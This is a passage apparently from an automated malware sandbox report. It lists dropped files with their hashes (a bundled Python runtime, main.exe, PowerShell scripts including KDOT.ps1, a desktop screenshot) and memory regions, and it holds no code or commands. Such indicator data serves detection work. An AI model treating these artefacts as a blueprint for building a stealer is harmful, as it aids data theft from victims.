                          a2afe994f8f2e847951e40485299e88718235fbefb17fccca7ace54cc6444c46

                          SHA512

                          ee3dbd00d6529fcfcd623227973ea248ac93f9095430b9dc4e3257b6dc002b614d7ce4f3daab3e02ef675502afdbe28862c14e30632e3c715c434440615c4dd4

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Hash\_BLAKE2s.pyd
                          Filesize

                          14KB

                          MD5

                          cea18eb87e54403af3f92f8d6dbdd6e8

                          SHA1

                          f1901a397edd9c4901801e8533c5350c7a3a8513

                          SHA256

                          7fe364add28266c8211457896d2517fdb0ee9efc8cb65e716847965b3e9d789f

                          SHA512

                          74a3c94d8c4070b66258a5b847d9ced705f81673dd12316604e392c9d21ae6890e3720ca810b38e140650397c6ff05fd2fa0ff2d136fc5579570520ffdc1dbac

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Hash\_BLAKE2s.pyd
                          Filesize

                          14KB

                          MD5

                          cea18eb87e54403af3f92f8d6dbdd6e8

                          SHA1

                          f1901a397edd9c4901801e8533c5350c7a3a8513

                          SHA256

                          7fe364add28266c8211457896d2517fdb0ee9efc8cb65e716847965b3e9d789f

                          SHA512

                          74a3c94d8c4070b66258a5b847d9ced705f81673dd12316604e392c9d21ae6890e3720ca810b38e140650397c6ff05fd2fa0ff2d136fc5579570520ffdc1dbac

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Hash\_MD5.pyd
                          Filesize

                          15KB

                          MD5

                          9adc256c4384ee1fe8c0ad5c5e44cd95

                          SHA1

                          c5fc6e7ae0dfa5cf87833b23cd0294e9ae1f5bca

                          SHA256

                          77ee1e140414615113eabb5fc43dbba69daee5951b7e27e387ca295b0c5f651d

                          SHA512

                          4cb0905f0196b34aa66ac6ff191bd4705146a3e00dcd8b3f674740d29404c22b61f3c75b6ffb1fd5fdb044320c89a2f3ef224f1f1aa35342ff3dc5f701642b76

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Hash\_MD5.pyd
                          Filesize

                          15KB

                          MD5

                          9adc256c4384ee1fe8c0ad5c5e44cd95

                          SHA1

                          c5fc6e7ae0dfa5cf87833b23cd0294e9ae1f5bca

                          SHA256

                          77ee1e140414615113eabb5fc43dbba69daee5951b7e27e387ca295b0c5f651d

                          SHA512

                          4cb0905f0196b34aa66ac6ff191bd4705146a3e00dcd8b3f674740d29404c22b61f3c75b6ffb1fd5fdb044320c89a2f3ef224f1f1aa35342ff3dc5f701642b76

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Hash\_SHA1.pyd
                          Filesize

                          17KB

                          MD5

                          5e6fef0ff0c688db13ed2777849e8e87

                          SHA1

                          3e739107b1b5ff8f1ffaac2ede75b71d4ebd128f

                          SHA256

                          e88a0347f9969991756815dff0af940f00e966bc7875aa4763a2c80516f7e4ed

                          SHA512

                          b97d4aa0ae76f528e643180ed300f1a50eafe8b82c27212a95ce380bca85f9ce1ff1ac1190173d56776fd663f649817514d6501ce80518f526159398daa6f55c

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Hash\_SHA1.pyd
                          Filesize

                          17KB

                          MD5

                          5e6fef0ff0c688db13ed2777849e8e87

                          SHA1

                          3e739107b1b5ff8f1ffaac2ede75b71d4ebd128f

                          SHA256

                          e88a0347f9969991756815dff0af940f00e966bc7875aa4763a2c80516f7e4ed

                          SHA512

                          b97d4aa0ae76f528e643180ed300f1a50eafe8b82c27212a95ce380bca85f9ce1ff1ac1190173d56776fd663f649817514d6501ce80518f526159398daa6f55c

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Hash\_SHA256.pyd
                          Filesize

                          21KB

                          MD5

                          6abdcd64face45efb50a3f2d6d792b93

                          SHA1

                          038dbd53932c4a539c69db54707b56e4779f0eef

                          SHA256

                          1031ea4c1fd2f673089052986629b6f554e5b34582b2f38e134fd64876d9ce0f

                          SHA512

                          6ebe3572938734d0fa9e4ec5abdb7f63d17f28ba7e94f1fe40926be93668d1a542ffc963f9a49c5f020720caad0852579fed6c9c6d0ab71b682e27245adc916c

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Hash\_SHA256.pyd
                          Filesize

                          21KB

                          MD5

                          6abdcd64face45efb50a3f2d6d792b93

                          SHA1

                          038dbd53932c4a539c69db54707b56e4779f0eef

                          SHA256

                          1031ea4c1fd2f673089052986629b6f554e5b34582b2f38e134fd64876d9ce0f

                          SHA512

                          6ebe3572938734d0fa9e4ec5abdb7f63d17f28ba7e94f1fe40926be93668d1a542ffc963f9a49c5f020720caad0852579fed6c9c6d0ab71b682e27245adc916c

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Protocol\_scrypt.pyd
                          Filesize

                          12KB

                          MD5

                          acd58f05ef429d4d85163b98b26a2307

                          SHA1

                          ccdf4a294b2e05b5e16784bae562bfdb474308a0

                          SHA256

                          bb2be221531d66ec5e6ef026f5548749430a785fd1fa1c1becb12375c0ca6d1d

                          SHA512

                          4cc272b161a7ea35e45274d2fb1358104f9bed5a7b460f1dc094c48ad834d94d779e73362c4e4ca3f3b7feae4da9812b5cd5f5edf7683668043a7c62b853a0d8

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Protocol\_scrypt.pyd
                          Filesize

                          12KB

                          MD5

                          acd58f05ef429d4d85163b98b26a2307

                          SHA1

                          ccdf4a294b2e05b5e16784bae562bfdb474308a0

                          SHA256

                          bb2be221531d66ec5e6ef026f5548749430a785fd1fa1c1becb12375c0ca6d1d

                          SHA512

                          4cc272b161a7ea35e45274d2fb1358104f9bed5a7b460f1dc094c48ad834d94d779e73362c4e4ca3f3b7feae4da9812b5cd5f5edf7683668043a7c62b853a0d8

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Util\_cpuid_c.pyd
                          Filesize

                          10KB

                          MD5

                          1831cb26fd8ee2b0ab0496f80272fc04

                          SHA1

                          bc8e78cc005859f7272c3615a3774ba7d687f0f4

                          SHA256

                          d830d77669527129bf3d10929aad1cc9ee5e44a9594e3fc651d3b5bc01c42c44

                          SHA512

                          df51d636a277c8ad83c90ae99a824f77c441da5c7b08a11c3d8752cd3661096ebf327008951ca97b4baf9632b2ca16df34a9f3e43bf837c8556bcb3c304bb2cc

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Util\_cpuid_c.pyd
                          Filesize

                          10KB

                          MD5

                          1831cb26fd8ee2b0ab0496f80272fc04

                          SHA1

                          bc8e78cc005859f7272c3615a3774ba7d687f0f4

                          SHA256

                          d830d77669527129bf3d10929aad1cc9ee5e44a9594e3fc651d3b5bc01c42c44

                          SHA512

                          df51d636a277c8ad83c90ae99a824f77c441da5c7b08a11c3d8752cd3661096ebf327008951ca97b4baf9632b2ca16df34a9f3e43bf837c8556bcb3c304bb2cc

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Util\_strxor.pyd
                          Filesize

                          10KB

                          MD5

                          3af448b8a7ef86d459d86f88a983eaec

                          SHA1

                          d852be273fea71d955ea6b6ed7e73fc192fb5491

                          SHA256

                          bf3a209eda07338762b8b58c74965e75f1f0c03d3f389b0103cc2bf13acfe69a

                          SHA512

                          be8c0a9b1f14d73e1adf50368293eff04ad34bda71dbf0b776ffd45b6ba58a2fa66089bb23728a5077ab630e68bf4d08af2712c1d3fb7d79733eb06f2d0f6dbf

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\Crypto\Util\_strxor.pyd
                          Filesize

                          10KB

                          MD5

                          3af448b8a7ef86d459d86f88a983eaec

                          SHA1

                          d852be273fea71d955ea6b6ed7e73fc192fb5491

                          SHA256

                          bf3a209eda07338762b8b58c74965e75f1f0c03d3f389b0103cc2bf13acfe69a

                          SHA512

                          be8c0a9b1f14d73e1adf50368293eff04ad34bda71dbf0b776ffd45b6ba58a2fa66089bb23728a5077ab630e68bf4d08af2712c1d3fb7d79733eb06f2d0f6dbf

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\VCRUNTIME140.dll
                          Filesize

                          106KB

                          MD5

                          4585a96cc4eef6aafd5e27ea09147dc6

                          SHA1

                          489cfff1b19abbec98fda26ac8958005e88dd0cb

                          SHA256

                          a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

                          SHA512

                          d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\VCRUNTIME140.dll
                          Filesize

                          106KB

                          MD5

                          4585a96cc4eef6aafd5e27ea09147dc6

                          SHA1

                          489cfff1b19abbec98fda26ac8958005e88dd0cb

                          SHA256

                          a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

                          SHA512

                          d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\_bz2.pyd
                          Filesize

                          82KB

                          MD5

                          a62207fc33140de460444e191ae19b74

                          SHA1

                          9327d3d4f9d56f1846781bcb0a05719dea462d74

                          SHA256

                          ebcac51449f323ae3ae961a33843029c34b6a82138ccd9214cf99f98dd2148c2

                          SHA512

                          90f9db9ee225958cb3e872b79f2c70cb1fd2248ebaa8f3282afff9250285852156bf668f5cfec49a4591b416ce7ebaaac62d2d887152f5356512f2347e3762b7

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\_bz2.pyd
                          Filesize

                          82KB

                          MD5

                          a62207fc33140de460444e191ae19b74

                          SHA1

                          9327d3d4f9d56f1846781bcb0a05719dea462d74

                          SHA256

                          ebcac51449f323ae3ae961a33843029c34b6a82138ccd9214cf99f98dd2148c2

                          SHA512

                          90f9db9ee225958cb3e872b79f2c70cb1fd2248ebaa8f3282afff9250285852156bf668f5cfec49a4591b416ce7ebaaac62d2d887152f5356512f2347e3762b7

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\_ctypes.pyd
                          Filesize

                          120KB

                          MD5

                          9b344f8d7ce5b57e397a475847cc5f66

                          SHA1

                          aff1ccc2608da022ecc8d0aba65d304fe74cdf71

                          SHA256

                          b1214d7b7efd9d4b0f465ec3463512a1cbc5f59686267030f072e6ce4b2a95cf

                          SHA512

                          2b0d9e1b550bf108fa842324ab26555f2a224aefff517fdb16df85693e05adaf0d77ebe49382848f1ec68dc9b5ae75027a62c33721e42a1566274d1a2b1baa41

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\_ctypes.pyd
                          Filesize

                          120KB

                          MD5

                          9b344f8d7ce5b57e397a475847cc5f66

                          SHA1

                          aff1ccc2608da022ecc8d0aba65d304fe74cdf71

                          SHA256

                          b1214d7b7efd9d4b0f465ec3463512a1cbc5f59686267030f072e6ce4b2a95cf

                          SHA512

                          2b0d9e1b550bf108fa842324ab26555f2a224aefff517fdb16df85693e05adaf0d77ebe49382848f1ec68dc9b5ae75027a62c33721e42a1566274d1a2b1baa41

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\_lzma.pyd
                          Filesize

                          155KB

                          MD5

                          0c7ea68ca88c07ae6b0a725497067891

                          SHA1

                          c2b61a3e230b30416bc283d1f3ea25678670eb74

                          SHA256

                          f74aaf0aa08cf90eb1eb23a474ccb7cb706b1ede7f911daf7ae68480765bdf11

                          SHA512

                          fd52f20496a12e6b20279646663d880b1354cffea10793506fe4560ed7da53e4efba900ae65c9996fbb3179c83844a9674051385e6e3c26fb2622917351846b9

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\_lzma.pyd
                          Filesize

                          155KB

                          MD5

                          0c7ea68ca88c07ae6b0a725497067891

                          SHA1

                          c2b61a3e230b30416bc283d1f3ea25678670eb74

                          SHA256

                          f74aaf0aa08cf90eb1eb23a474ccb7cb706b1ede7f911daf7ae68480765bdf11

                          SHA512

                          fd52f20496a12e6b20279646663d880b1354cffea10793506fe4560ed7da53e4efba900ae65c9996fbb3179c83844a9674051385e6e3c26fb2622917351846b9

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\base_library.zip
                          Filesize

                          1.7MB

                          MD5

                          ebb4f1a115f0692698b5640869f30853

                          SHA1

                          9ba77340a6a32af08899e7f3c97841724dd78c3f

                          SHA256

                          4ab0deb6a298d14a0f50d55dc6ce5673b6c5320817ec255acf282191642a4576

                          SHA512

                          3f6ba7d86c9f292344f4ad196f4ae863bf936578dd7cfac7dc4aaf05c2c78e68d5f813c4ed36048b6678451f1717deeb77493d8557ee6778c6a70beb5294d21a

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\libffi-8.dll
                          Filesize

                          38KB

                          MD5

                          0f8e4992ca92baaf54cc0b43aaccce21

                          SHA1

                          c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

                          SHA256

                          eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

                          SHA512

                          6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\libffi-8.dll
                          Filesize

                          38KB

                          MD5

                          0f8e4992ca92baaf54cc0b43aaccce21

                          SHA1

                          c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

                          SHA256

                          eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

                          SHA512

                          6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\python311.dll
                          Filesize

                          5.5MB

                          MD5

                          e2bd5ae53427f193b42d64b8e9bf1943

                          SHA1

                          7c317aad8e2b24c08d3b8b3fba16dd537411727f

                          SHA256

                          c4844b05e3a936b130adedb854d3c04d49ee54edb43e9d36f8c4ae94ccb78400

                          SHA512

                          ae23a6707e539c619fd5c5b4fc6e4734edc91f89ebe024d25ff2a70168da6105ac0bd47cf6bf3715af6411963caf0acbb4632464e1619ca6361abf53adfe7036

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\python311.dll
                          Filesize

                          5.5MB

                          MD5

                          e2bd5ae53427f193b42d64b8e9bf1943

                          SHA1

                          7c317aad8e2b24c08d3b8b3fba16dd537411727f

                          SHA256

                          c4844b05e3a936b130adedb854d3c04d49ee54edb43e9d36f8c4ae94ccb78400

                          SHA512

                          ae23a6707e539c619fd5c5b4fc6e4734edc91f89ebe024d25ff2a70168da6105ac0bd47cf6bf3715af6411963caf0acbb4632464e1619ca6361abf53adfe7036

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\ucrtbase.dll
                          Filesize

                          994KB

                          MD5

                          8e7680a8d07c3c4159241d31caaf369c

                          SHA1

                          62fe2d4ae788ee3d19e041d81696555a6262f575

                          SHA256

                          36cc22d92a60e57dee394f56a9d1ed1655ee9db89d2244a959005116a4184d80

                          SHA512

                          9509f5b07588a08a490f4c3cb859bbfe670052c1c83f92b9c3356afa664cb500364e09f9dafac7d387332cc52d9bb7bb84ceb1493f72d4d17ef08b9ee3cb4174

                        • C:\Users\Admin\AppData\Local\Temp\_MEI34122\ucrtbase.dll
                          Filesize

                          994KB

                          MD5

                          8e7680a8d07c3c4159241d31caaf369c

                          SHA1

                          62fe2d4ae788ee3d19e041d81696555a6262f575

                          SHA256

                          36cc22d92a60e57dee394f56a9d1ed1655ee9db89d2244a959005116a4184d80

                          SHA512

                          9509f5b07588a08a490f4c3cb859bbfe670052c1c83f92b9c3356afa664cb500364e09f9dafac7d387332cc52d9bb7bb84ceb1493f72d4d17ef08b9ee3cb4174

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t2xd1mhf.p1u.ps1
                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\hfmj0gyh\hfmj0gyh.dll
                          Filesize

                          5KB

                          MD5

                          af212f201168b327d99a15c43c8755d1

                          SHA1

                          9304155a47c6913495ac62a1d6ef5455c7977662

                          SHA256

                          ae953876cf272f2c18a27f3ed931e1611dfb702ccc496bc331b71254de8c1836

                          SHA512

                          13fd051794db6364b174a82d4fd13f3ebffe3d29c6c6f130f799a5139ef31bd3166fac427598e019c2bd65b8ca6ffc9bae4ff992ccebc5a38b8254e2c0dbfa3d

                        • C:\Users\Admin\AppData\Local\Temp\j4q40aaf\j4q40aaf.dll
                          Filesize

                          3KB

                          MD5

                          4dc313927d46a46a1562249604be53e0

                          SHA1

                          187996dbf8ba5873210eae472eaea69ff20b2164

                          SHA256

                          f4f6c9ffb9604571bf652b385cc22b0be7530e1b60063a838078f127f8d9201c

                          SHA512

                          5291031c86aa9b886937aa661874dfb12d2a28f2a4a7137200a7fae2b68d4d651c4d8bd6266f6e6f3aabea47659b52c258ca1a534a07272f1d6fd0748fdfa7d2

                        • C:\Users\Admin\AppData\Local\Temp\main.bat
                          Filesize

                          1020KB

                          MD5

                          14a8813dee6c76682f952a2971d25ff2

                          SHA1

                          fa45396583999cc568fe68cf1335cd3c52652564

                          SHA256

                          462eedc4cd4d68582230a2204d019ea89125d778110ed0ca5bb6240675f72a2b

                          SHA512

                          1cea307973e2ac03ec87b39a5d8f482452254471f4fa60519f601d00825cef00547927bfe6332152124508eadcaaae59dbc5c4707aaf5eb49dfde8fdb477d5d0

                        • C:\Users\Admin\AppData\Local\Temp\main.exe
                          Filesize

                          11.9MB

                          MD5

                          600565393746692171ff0771569dde1c

                          SHA1

                          a6950ccdb3b9494308fd725e99366377ae1c561c

                          SHA256

                          ac385e2f07cce1fa17e9f7bbd6b0437ef7ca3c155aba15cc16e22dcb10f7b5cc

                          SHA512

                          a0be61ec9cef9d7b1f593bb81060b17468db7daae0e6fddf945320857f18ba379b120e9ec50dae5c344e8fffb80c6940176c8227acb470bfb8dcb4aa4fd9e1e2

                        • C:\Users\Admin\AppData\Local\Temp\main.exe
                          Filesize

                          11.9MB

                          MD5

                          600565393746692171ff0771569dde1c

                          SHA1

                          a6950ccdb3b9494308fd725e99366377ae1c561c

                          SHA256

                          ac385e2f07cce1fa17e9f7bbd6b0437ef7ca3c155aba15cc16e22dcb10f7b5cc

                          SHA512

                          a0be61ec9cef9d7b1f593bb81060b17468db7daae0e6fddf945320857f18ba379b120e9ec50dae5c344e8fffb80c6940176c8227acb470bfb8dcb4aa4fd9e1e2

                        • C:\Users\Admin\AppData\Local\Temp\main.exe
                          Filesize

                          11.9MB

                          MD5

                          600565393746692171ff0771569dde1c

                          SHA1

                          a6950ccdb3b9494308fd725e99366377ae1c561c

                          SHA256

                          ac385e2f07cce1fa17e9f7bbd6b0437ef7ca3c155aba15cc16e22dcb10f7b5cc

                          SHA512

                          a0be61ec9cef9d7b1f593bb81060b17468db7daae0e6fddf945320857f18ba379b120e9ec50dae5c344e8fffb80c6940176c8227acb470bfb8dcb4aa4fd9e1e2

                        • C:\Users\Admin\AppData\Local\Temp\powershell123.ps1
                          Filesize

                          58KB

                          MD5

                          88fed6590f1074279114c171bc995744

                          SHA1

                          8417cd1ace62caddfb055afc3b2df0141e97e07a

                          SHA256

                          feaca49ef687ba3a069f195772ad32e10898cd69b3e00a99961b664cfcba3c65

                          SHA512

                          175fb883d11cf4e7ed6987f478bd6354368011949314abfce2d069741542c3724852d0875fee6bbfa2dcf14c3caa6fc77196d75a69b2a86f062523832e91c384

                        • C:\Users\Admin\AppData\Local\temp\desktop-screenshot.png
                          Filesize

                          429KB

                          MD5

                          42078205b71c6db961d0448bde977e8e

                          SHA1

                          0a3ec2bed56afb7f559c0393ede5d130ff0efff9

                          SHA256

                          870520eacddc4dddc6e7459a51b978bdcf8db7f0f46723fb7009d5d756b12e6a

                          SHA512

                          1144c429faf8c7cb9c67f2aa6e333e625fd1ded031f90691501ca9c7a70f7c8ecebbe7e252d39186ec7f5dcb819bcdda5b07a3da60e581aefdb52f7ca3d5bd2e

                        • C:\Users\Admin\AppData\Roaming\KDOT\KDOT.ps1
                          Filesize

                          58KB

                          MD5

                          d038ba70c8c40b54da6994b3f7190f67

                          SHA1

                          9c956e7f8510d2ec9705baad47b8c6edcaf11291

                          SHA256

                          570732f597ea97003821bf875c9147ccf8fc76d4dabaaeab9428d4f86dbed870

                          SHA512

                          1a6147a66078e0c24cb0cef9719da8efb2358d00441f2232360bf44a5e9a9bd8db6bb5dcb00b8707cbcf53687f9d92957c36466f62b1c8c46ff862e14a921a7f

                        • \??\c:\Users\Admin\AppData\Local\Temp\hfmj0gyh\CSC65AF041F9794E44B2F3FBEEB7B99F10.TMP
                          Filesize

                          652B

                          MD5

                          a83e10ee3fbb542feb35bc3145ff2869

                          SHA1

                          aebc437189cb04f5e5d80e11c639f984ccf65894

                          SHA256

                          f953f33e9de374db44ff6568025cc372a97a9e561480339a7dad02c8d37a9827

                          SHA512

                          7cb8375007e6635ca6ba95b9157ff6b1cbd0155ca8d60c25c95abfea55e2b8afe5c1276425ab2a02529e5c1275b04c89b731f3b0c0d4016588614c48dc83453d

                        • \??\c:\Users\Admin\AppData\Local\Temp\hfmj0gyh\hfmj0gyh.0.cs
                          Filesize

                          5KB

                          MD5

                          046d50877fc26961fca09ef4c9aec711

                          SHA1

                          f8dcaecdac8ff079871baaa112b2d07b126b206d

                          SHA256

                          fab3b097068bcd675f7702344d6881ee4de7afffb328d645cd59ff3b2f079393

                          SHA512

                          b38b3ce3b573a457aec47ed5a5582d92cd57a472e385c983246166164e0bf650b65f4968f21d29fbba9ea10014fd824270e3728e9437d90e3143c824ebfcc0a4

                        • \??\c:\Users\Admin\AppData\Local\Temp\hfmj0gyh\hfmj0gyh.cmdline
                          Filesize

                          712B

                          MD5

                          d29b0a4f01f63bfa59498ef3b58f64c2

                          SHA1

                          f5bc7a3a30acb68ebc59ae47218ddf5824878998

                          SHA256

                          70cc9a51e33615054efdf50c4b60a65e33d872ab48ce0c96b15b339ba691a67a

                          SHA512

                          6998da9b1eff494939506875f55b9e6d4b2fa2f8e31d1ee76570080eb3646c8e31faec1ea0aa50b8a4f82fe8ee29c56b21724fde75b2fe308a4f6b8172a76f8c

                        • \??\c:\Users\Admin\AppData\Local\Temp\j4q40aaf\CSC160FFD61925F4A5198B6837EEEF760B6.TMP
                          Filesize

                          652B

                          MD5

                          3cd4458e7439e9072cfb8c70403833aa

                          SHA1

                          8c5bd291765abe152882a132cc689cb17985f929

                          SHA256

                          39ad174a284aef182aa2b871b4d59e95f74eca318ceabcf9553b65531540ba99

                          SHA512

                          e339ed59be277dfb5e99b8772f3bb7d0b69bfd686f440b4ab9d5edc8401de5368428451f2ecd1ff555650e5a96697dcb2212b88a611530e5ebdcf04db448796b

                        • \??\c:\Users\Admin\AppData\Local\Temp\j4q40aaf\j4q40aaf.0.cs
                          Filesize

                          336B

                          MD5

                          016136b12c8022e3155820dd8811cf72

                          SHA1

                          27dc5ae36badef983dbda987bdb4c584659433b6

                          SHA256

                          363bc109def451724e5a8fa71b8598e7cd1ea4994622407006def7b2f67dfc56

                          SHA512

                          7055a3c610cc797f009cf7bce08febe6d90394736e86c8f4a0f13ee5b9b213649d0c0ce1288199f2aa6c38730b119c751233793f53f694badef0f577deb53c43

                        • \??\c:\Users\Admin\AppData\Local\Temp\j4q40aaf\j4q40aaf.cmdline
                          Filesize

                          369B

                          MD5

                          aa8bffe4ca01c34ccb01f50b80e83e20

                          SHA1

                          2fb97bad87baecbe7a15daa5d5f01bdec76245b2

                          SHA256

                          201c73ba621248b0887dae400d87363a91bf813be4ff739889d9f41552b28d57

                          SHA512

                          a52ee633c57dab8c473496df4875475c6ebdbfad5e758306704692e2c3d7423c71c635619c6f15effe5cb853626c4a18f7142a9e6c62d612d1c6216630f3b2a1

                        • memory/1244-197-0x0000026B79EA0000-0x0000026B79EB0000-memory.dmp
                          Filesize

                          64KB

                        • memory/1244-198-0x0000026B79EA0000-0x0000026B79EB0000-memory.dmp
                          Filesize

                          64KB

                        • memory/1244-196-0x0000026B79EA0000-0x0000026B79EB0000-memory.dmp
                          Filesize

                          64KB

                        • memory/2092-150-0x000001E0BE1F0000-0x000001E0BE200000-memory.dmp
                          Filesize

                          64KB

                        • memory/2092-256-0x000001E0BE1F0000-0x000001E0BE200000-memory.dmp
                          Filesize

                          64KB

                        • memory/2092-255-0x000001E0BE1F0000-0x000001E0BE200000-memory.dmp
                          Filesize

                          64KB

                        • memory/2092-254-0x000001E0BE1F0000-0x000001E0BE200000-memory.dmp
                          Filesize

                          64KB

                        • memory/2092-148-0x000001E0BE1F0000-0x000001E0BE200000-memory.dmp
                          Filesize

                          64KB

                        • memory/2092-139-0x000001E0A5C50000-0x000001E0A5C72000-memory.dmp
                          Filesize

                          136KB

                        • memory/2092-149-0x000001E0BE1F0000-0x000001E0BE200000-memory.dmp
                          Filesize

                          64KB

                        • memory/3116-222-0x00000213E3E00000-0x00000213E3E10000-memory.dmp
                          Filesize

                          64KB

                        • memory/3116-223-0x00000213E3E00000-0x00000213E3E10000-memory.dmp
                          Filesize

                          64KB

                        • memory/4248-264-0x0000018D3DBD0000-0x0000018D3DBE0000-memory.dmp
                          Filesize

                          64KB

                        • memory/4248-238-0x0000018D3DBD0000-0x0000018D3DBE0000-memory.dmp
                          Filesize

                          64KB

                        • memory/4248-237-0x0000018D3DBD0000-0x0000018D3DBE0000-memory.dmp
                          Filesize

                          64KB

                        • memory/4248-236-0x0000018D3DBD0000-0x0000018D3DBE0000-memory.dmp
                          Filesize

                          64KB

                        • memory/4248-578-0x0000018D40820000-0x0000018D4082A000-memory.dmp
                          Filesize

                          40KB

                        • memory/4248-577-0x0000018D40830000-0x0000018D40842000-memory.dmp
                          Filesize

                          72KB

                        • memory/4248-252-0x0000018D409F0000-0x0000018D41196000-memory.dmp
                          Filesize

                          7.6MB

                        • memory/4248-263-0x0000018D3DBD0000-0x0000018D3DBE0000-memory.dmp
                          Filesize

                          64KB

                        • memory/4248-265-0x0000018D3DBD0000-0x0000018D3DBE0000-memory.dmp
                          Filesize

                          64KB

                        • memory/4248-266-0x0000018D3DBD0000-0x0000018D3DBE0000-memory.dmp
                          Filesize

                          64KB

                        • memory/4248-272-0x0000018D406C0000-0x0000018D406EA000-memory.dmp
                          Filesize

                          168KB

                        • memory/4248-273-0x0000018D406C0000-0x0000018D406E4000-memory.dmp
                          Filesize

                          144KB

                        • memory/4248-278-0x0000018D3DBD0000-0x0000018D3DBE0000-memory.dmp
                          Filesize

                          64KB

                        • memory/4248-286-0x00000195415A0000-0x0000019541762000-memory.dmp
                          Filesize

                          1.8MB

                        • memory/4248-287-0x0000019542050000-0x0000019542578000-memory.dmp
                          Filesize

                          5.2MB

                        • memory/4248-625-0x0000018D408A0000-0x0000018D408E4000-memory.dmp
                          Filesize

                          272KB

                        • memory/4248-626-0x0000018D40970000-0x0000018D409E6000-memory.dmp
                          Filesize

                          472KB